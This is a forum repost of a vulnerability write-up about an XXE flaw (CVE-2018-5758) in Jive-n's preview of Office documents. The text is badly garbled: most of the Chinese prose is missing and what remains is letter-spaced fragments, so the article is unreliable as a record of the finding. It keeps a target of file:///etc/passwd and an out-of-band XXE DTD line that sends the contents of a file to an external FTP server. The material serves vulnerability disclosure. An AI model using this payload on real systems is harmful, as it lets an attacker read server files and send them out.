[12509] 2018-03-25_看我如何在Jive-n中发现了一个XXE漏洞(CVE-2018-5758)

文档创建者:s7ckTeam
浏览次数:18
最后更新:2025-01-18
2018-03-25_看我如何在Jive-n中发现了一个XXE漏洞(CVE-2018-5758) J i v e - n X X E   ( C V E - 2 0 1 8 - 5 7 5 8 ) A l p h a _ h 4 c k   F r e e B u f   2 0 1 8 - 0 3 - 2 5 J i v e   S o f t w a r e J i v e - n X M L X X E - C V E - 2 0 1 8 - 5 7 5 8 ( ) R h i n o J i v e - n X M L X X E X X E   P a y l o a d W o r d J i v e - n / X X E O W A S P _ P r o c e s s i n g ) J i v e - n J i v e   S o f t w a r e J i v e - n J i v e   S o f t w a r e S a a S 使 / 使 J i v e - n 使 A p p J i v e - n F l a s h 使 o f f i c e X X E X X E P a y l o a d 使 X M L 使 H T T P D T D 使 F T P X M L 使 o x m l _ x x e f i l e : / / / e t c / p a s s w d X X E R h i n o - H T T P 8 0 F T P 8 0 8 0 使 D T D X X E W o r d J i v e - n 使 F l a s h O f f i c e W o r d E x c e l P o w e r P o i n t < ! E N T I T Y   %   a l l   " < ! E N T I T Y   s e n d   S Y S T E M ' f t p : / / o u r - e x t e r n a l - s e r v e r . c o m : 8 0 8 0 / % f i l e ; ' > " > % a l l ;
使 稿 J i v e - n J i v e - n X M L P a y l o a d V i e w P a y l o a d X X E 1 .   H T T P 2 .   绿 3 .   F T P f i l e : / / / e t c / e t c J i v e - n 使 P a y l o a d F T P 使 使 X M L C V E - 2 0 1 8 - 5 7 5 8 J i v e - n X X E D T D 访 X M L S a a S J i v e - n *   r h i n o s e c u r i t y l a b s F B A l p h a _ h 4 c k F r e e B u f . C O M
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则